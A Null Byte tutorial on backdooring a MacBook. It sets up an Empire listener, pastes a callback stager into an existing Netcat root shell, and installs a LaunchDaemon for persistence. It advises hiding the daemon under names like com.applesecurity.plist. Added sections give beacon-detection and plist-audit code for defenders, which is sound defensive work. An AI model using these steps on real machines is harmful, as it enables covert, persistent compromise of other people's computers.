
How to Install a Persistent Empire Backdoor on a MacBook «Null Byte :: WonderHowTo



After gaining backdoor access to a MacBook that isn't protected by FileVault, or remote access through a fake PDF document, an attacker might want to upgrade their Netcat shell to something more capable. While a root shell already allows an attacker to remotely modify most files on the MacBook, Empire has some useful post-exploitation modules that make hacking Macs very easy.

At this point, an attacker would already have remote access to the target MacBook or another Mac computer. In my example, I'm building on an already established Netcat backdoor:

  tokyoneon:~$ nc -l -p 1234
  listening on [any] 1234 ...
  xx.xx.x.xx xxxxxxxxx xxxx xxxxxx xxxxx: xxxxxxxx xxxxxx
  connect to [xx.xx.x.xx] from (xxxxx) [xx.xx.x.xx] 50027
  bash: no job control in this shell
  bash-3.2# _

To begin, Empire should be installed and configured on the attacker's system. If the target MacBook is on the local network, installing Empire in Kali will do the trick. If the target is mobile and constantly moving between Wi-Fi networks, Empire should be installed on the attacker's virtual private server (VPS).

Step 1: Start the Empire Listener

Empire should be running with a listener waiting for incoming connections from the target MacBook. In this example, I'm using an HTTP listener on port 8080. The following commands will quickly set up an Empire listener:

  uselistener http
  set Port 8080
  set Host xx.xx.x.xx
  execute

This is what it should look like after you have executed the commands:

  (Empire)> listeners
  [!] No listeners currently active
  (Empire: listeners)> uselistener http
  (Empire: listeners/http)> set Port 8080
  (Empire: listeners/http)> set Host xx.xx.x.xx
  (Empire: listeners/http)> execute
  [*] Starting listener 'http'
   * Serving Flask app "http" (lazy loading)
   * Environment: production
     WARNING: Do not use the development server in a production environment.
     Use a production WSGI server instead.
   * Debug mode: off
  [+] Listener successfully started!
  (Empire: listeners/http)> listeners

  [*] Active listeners:

    Name    Module    Host                      Delay/Jitter
    ----    ------    ----                      ------------
    http    http      http://xx.xx.x.xx:8080    5/0.0

  (Empire: listeners)> _
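Seen from the network side, that listener table is the thing to watch: Delay/Jitter 5/0.0 means the agent will call back to the listener every 5 seconds with no randomisation, which is far more regular than anything a person generates. The following is an added example, not code from the original article or from the Empire project, that flags such fixed-interval flows in connection logs by measuring how evenly spaced each source/destination pair's connections are. The log format, the sample lines (IP addresses included) and the thresholds are constructed assumptions for the demonstration.

```python
# Added example (not from the original article or Empire): detect fixed-interval
# beaconing in connection logs. Log format, sample lines and thresholds are
# constructed assumptions for the demonstration.
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not real traffic): "<timestamp> <src> -> <dst>:<port>".
# The first flow checks in every 5 seconds (Delay 5, Jitter 0.0); the second is
# ordinary bursty browsing to a web server.
SAMPLE_LOG = """\
2019-01-01T10:00:00 192.168.1.20 -> 203.0.113.10:8080
2019-01-01T10:00:05 192.168.1.20 -> 203.0.113.10:8080
2019-01-01T10:00:10 192.168.1.20 -> 203.0.113.10:8080
2019-01-01T10:00:15 192.168.1.20 -> 203.0.113.10:8080
2019-01-01T10:00:20 192.168.1.20 -> 203.0.113.10:8080
2019-01-01T10:00:25 192.168.1.20 -> 203.0.113.10:8080
2019-01-01T10:00:03 192.168.1.20 -> 198.51.100.7:443
2019-01-01T10:00:41 192.168.1.20 -> 198.51.100.7:443
2019-01-01T10:01:12 192.168.1.20 -> 198.51.100.7:443
2019-01-01T10:03:05 192.168.1.20 -> 198.51.100.7:443
2019-01-01T10:03:06 192.168.1.20 -> 198.51.100.7:443
2019-01-01T10:07:30 192.168.1.20 -> 198.51.100.7:443
"""

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+)$")


def parse_log(text):
    """Group connection timestamps by (src, dst, port); skip malformed lines."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, dst, port = m.groups()
        flows[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(timestamps):
    """Return (mean gap in seconds, coefficient of variation) for a flow.

    A coefficient of variation near 0 means near-perfectly periodic
    connections. Returns None when there are too few gaps to judge.
    """
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:
        return None
    mean = statistics.mean(gaps)
    if mean == 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(text, min_connections=5, max_cv=0.2):
    """Flag flows with >= min_connections whose gap variation is <= max_cv."""
    hits = []
    for key, times in parse_log(text).items():
        if len(times) < min_connections:
            continue
        score = beacon_score(times)
        if score and score[1] <= max_cv:
            hits.append((key, round(score[0], 1), round(score[1], 3)))
    return sorted(hits)


if __name__ == "__main__":
    for (src, dst, port), mean, cv in find_beacons(SAMPLE_LOG):
        print(f"[!] {src} -> {dst}:{port} beacons every ~{mean}s (CV {cv})")
```

The coefficient of variation (standard deviation of the gaps divided by their mean) is 0 for the perfectly periodic flow and well above 1 for the bursty one. An agent configured with a non-zero jitter will not score 0, so treat the cutoff and the connection count as tuning knobs, look at longer windows, and combine the score with destination reputation rather than relying on one threshold.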

Step 2: Generate the Stager

Next, create a launcher script with the osx/launcher stager. This can be done with the following commands:

  usestager osx/launcher
  set Listener http
  generate

The entire Empire output should be copied and pasted into the Netcat terminal. In my example, this is the long line starting with "echo" at the bottom of the output.

A new agent will appear in the Empire terminal once the MacBook has been exploited:

  (Empire: agents)> [*] Sending PYTHON stager (stage 1) to xx.xx.x.xx
  [*] Agent P98MAEE0 from xx.xx.x.xx posted valid Python PUB key
  [*] New agent P98MAEE0 checked in
  [+] Initial agent P98MAEE0 from xx.xx.x.xx now active (Slack)
  [*] Sending agent (stage 2) to P98MAEE0 at xx.xx.x.xx
  [>] ...................

  (Empire: agents)> _

The attacker now has a large number of post-exploitation modules available. Stay tuned for future articles, where I'll show how to use Empire's more advanced modules to further compromise the MacBook and its Wi-Fi networks.

Deploying Empire is easy enough for a hacker who wants to upgrade their shell to a more advanced framework such as Empire or Metasploit. Maintaining such a backdoor over the long term is a little trickier, though: the Python script currently running as a background process will terminate when the user logs out or the computer is shut down.

The following persistence method creates a new Empire agent every time the MacBook restarts.

Step 3: Set Persistence with Empire

In the Empire terminal, use the agents command to display the newly created agent. Then use the interact command to start interacting with the compromised MacBook:

  (Empire)> agents

  [*] Active agents:

    Name        Internal IP    Machine Name       Username    Process
    ----        -----------    ------------       --------    -------
    P98MAEE0    xx.xx.x.xx     xxxxx MacBook A    *root       /usr/bin/py

  (Empire: agents)> interact P98MAEE0
  (Empire: P98MAEE0)> _

The info command displays the available module options:

  (Empire)> interact P98MAEE0
  (Empire: P98MAEE0)> usemodule persistence/osx/launchdaemonexecutable
  (Empire: python/persistence/osx/launchdaemonexecutable)> info

  Options:

    Name            Required    Value                   Description
    ----            --------    -----                   -----------
    SafeChecks      True        True                    Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.
    DaemonLocation  True                                The full path of where the Empire launch daemon should be located.
    DaemonName      True        com.proxy.initialize    Name of the Launch Daemon to install. Name will also be used for the plist file.
    Agent           True        P98MAEE0                Agent to execute module on.
    Listener        True                                Listener to use.
    UserAgent       False       default                 User-agent string to use for the staging request (default, none, or other).

  (Empire: python/persistence/osx/launchdaemonexecutable)> _

This particular Empire module requires several options to be set before running on the target MacBook. The required options can be set with the following commands:

  set DaemonLocation /etc/empire_persistence
  set DaemonName com.empire
  set Agent P98MAEE0
  set Listener http

In my example, this looks like:

  (Empire: python/persistence/osx/launchdaemonexecutable)> set DaemonLocation /etc/empire_persistence
  (Empire: python/persistence/osx/launchdaemonexecutable)> set DaemonName com.empire
  (Empire: python/persistence/osx/launchdaemonexecutable)> set Agent P98MAEE0
  (Empire: python/persistence/osx/launchdaemonexecutable)> set Listener http
  (Empire: python/persistence/osx/launchdaemonexecutable)> _

  • DaemonLocation is the full path to the Empire executable that runs when the MacBook restarts. For demonstration purposes I'm using the /etc/ directory and the file name empire_persistence. To avoid detection, the daemon could be created in a less obvious location.
  • DaemonName (com.empire) is the name of the .plist configuration file and can be changed to anything. For a more convincing file name, attackers can use something like com.applesecurity.plist. This .plist file is automatically stored in the /Library/LaunchDaemons/ directory on the target MacBook and should not be moved or modified; launch daemons must be in that directory.
  • Agent and Listener should also be set accordingly if they were not set automatically.

Use the execute command to embed the Empire backdoor into the MacBook:

  execute

Below is what my example looks like. You may need to press Y if you're warned that the module is not opsec-safe.

  (Empire: python/persistence/osx/launchdaemonexecutable)> execute
  [>] Module is not opsec safe, run? [y/N] y
  [*] Tasked P98MAEE0 to run TASK_CMD_WAIT
  [*] Agent P98MAEE0 tasked with task ID 1
  [*] Tasked agent P98MAEE0 to run module python/persistence/osx/launchdaemonexecutable
  (Empire: python/persistence/osx/launchdaemonexecutable)> [*] Agent P98MAEE0 returned results.

  [+] Persistence has been installed: /Library/LaunchDaemons/com.empire.plist

  [+] Empire daemon has been written to /etc/empire_persistence

  [*] Valid results returned by xx.xx.x.xx

  (Empire: python/persistence/osx/launchdaemonexecutable)> _

How to Protect Against Persistent Backdoors

While some antivirus software may protect against such attacks, there is no way to be sure without performing some tests on a Mac, which I will do later for an antivirus-bypass article. I will update my results here if they actually protect against persistent backdoors. Otherwise, the manual check is to list the launch daemons, unload any you don't recognize, and delete their plists:

  tokyoneon:~ root# cd /Library/LaunchDaemons/
  tokyoneon:/Library/LaunchDaemons root# ls
  com.apple.plist     com.h4ck3r.plist
  com.empire.plist    com.netcat.plist
  tokyoneon:/Library/LaunchDaemons root# sudo launchctl unload com.h4ck3r.plist
  tokyoneon:/Library/LaunchDaemons root# rm com.h4ck3r.plist
  tokyoneon:/Library/LaunchDaemons root# _
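From the defender's side, the module options above tell you exactly what to look for: a new .plist in /Library/LaunchDaemons/ whose program points at an executable in an unusual place such as /etc/empire_persistence, under a label chosen to look like a vendor's. The following is an added example, not code from the original article or from the Empire project: a Python audit that parses launch daemon plists with the standard-library plistlib and flags ones whose program lives outside the usual system directories, runs an interpreter, or carries an inline -c command. The trusted and suspicious path lists are my own heuristics, and the three sample plists are constructed for the demonstration (one mirrors what the module above writes).

```python
# Added example (not from the original article or the Empire project):
# heuristic audit of launchd daemon plists. The path lists below are
# assumptions for the demonstration, not an official allow-list.
import os
import plistlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Where legitimately installed daemon executables normally live (assumed list).
TRUSTED_EXEC_PREFIXES = (
    "/System/Library/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/",
    "/bin/", "/sbin/", "/Applications/", "/Library/Application Support/",
    "/Library/PrivilegedHelperTools/",
)
# Configuration, temp and home directories: executables do not belong here.
SUSPICIOUS_EXEC_PREFIXES = (
    "/etc/", "/private/etc/", "/tmp/", "/private/tmp/", "/var/tmp/", "/Users/",
)
# A daemon that just launches an interpreter warrants a look wherever it lives.
INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "zsh",
                "osascript", "perl", "ruby"}


@dataclass
class Finding:
    plist_name: str
    label: str
    program: str
    reasons: List[str] = field(default_factory=list)


def program_path(plist: Dict) -> str:
    """Executable launchd will start: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def analyze_plist(name: str, plist: Dict) -> Optional[Finding]:
    """Return a Finding listing why this plist looks suspicious, or None."""
    prog = program_path(plist)
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    reasons = []
    if prog.startswith(SUSPICIOUS_EXEC_PREFIXES):
        reasons.append(f"executable in suspicious location: {prog}")
    elif not prog.startswith(TRUSTED_EXEC_PREFIXES):
        reasons.append(f"executable outside trusted directories: {prog or '<none>'}")
    if os.path.basename(prog) in INTERPRETERS:
        reasons.append("daemon runs an interpreter: " + " ".join(args))
    if "-c" in args:
        reasons.append("inline command passed with -c in ProgramArguments")
    label = str(plist.get("Label", ""))
    if label != os.path.splitext(name)[0]:
        reasons.append(f"Label {label!r} does not match file name {name!r}")
    return Finding(name, label, prog, reasons) if reasons else None


def audit_plists(plists: Dict[str, Dict]) -> List[Finding]:
    """Audit a {file name: parsed plist} mapping, in file-name order."""
    findings = []
    for name in sorted(plists):
        finding = analyze_plist(name, plists[name])
        if finding:
            findings.append(finding)
    return findings


def load_launch_daemons(directory: str = "/Library/LaunchDaemons") -> Dict[str, Dict]:
    """Parse every .plist in a directory (for use on a real Mac)."""
    loaded = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                loaded[name] = plistlib.load(fh)
    return loaded


# Constructed sample plists for the demonstration (not taken from a real system).
SAMPLE_PLISTS = {
    "com.apple.example.plist": {   # constructed: normal system-style daemon
        "Label": "com.apple.example",
        "ProgramArguments": ["/usr/libexec/example"],
        "RunAtLoad": True,
    },
    "com.empire.plist": {          # mirrors what the module above writes
        "Label": "com.empire",
        "ProgramArguments": ["/etc/empire_persistence"],
        "RunAtLoad": True,
    },
    "com.applesecurity.plist": {   # constructed: vendor-looking name, shell -c payload
        "Label": "com.applesecurity",
        "ProgramArguments": ["/bin/bash", "-c", "<constructed placeholder command>"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
}

if __name__ == "__main__":
    import sys
    target = load_launch_daemons(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PLISTS
    for f in audit_plists(target):
        print(f"[!] {f.plist_name} (Label {f.label}) -> {f.program}")
        for reason in f.reasons:
            print("      -", reason)
```

Run it with no arguments to audit the embedded samples, or pass /Library/LaunchDaemons to audit a real Mac. A finding is a prompt to inspect, not proof of compromise: third-party software that installs a helper under /usr/local or a script wrapper will show up too, so review the executable and its code signature before unloading anything.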


Title image by Iliescu Victor/Pexels; screenshots by tokyoneon/Null Byte
